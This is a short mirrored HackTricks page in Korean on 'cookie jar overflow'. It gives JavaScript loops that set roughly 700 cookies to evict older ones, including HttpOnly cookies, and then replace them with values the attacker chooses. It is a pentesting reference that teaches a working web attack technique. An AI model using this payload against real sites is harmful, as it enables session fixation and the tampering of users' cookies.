mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
1.1 KiB
1.1 KiB
{{#include ../../banners/hacktricks-training.md}}
브라우저는 페이지에 저장할 수 있는 쿠키의 수에 제한이 있습니다. 따라서 어떤 이유로 쿠키를 사라지게 해야 하는 경우, 쿠키 항아리를 오버플로우하여 가장 오래된 쿠키가 삭제되도록 할 수 있습니다:
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}
// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
타사 쿠키가 다른 도메인을 가리키는 경우 덮어쓰이지 않음을 유의하세요.
Caution
이 공격은 HttpOnly 쿠키를 덮어쓸 수 있습니다. 쿠키를 삭제한 다음 원하는 값으로 재설정할 수 있습니다.
{{#include ../../banners/hacktricks-training.md}}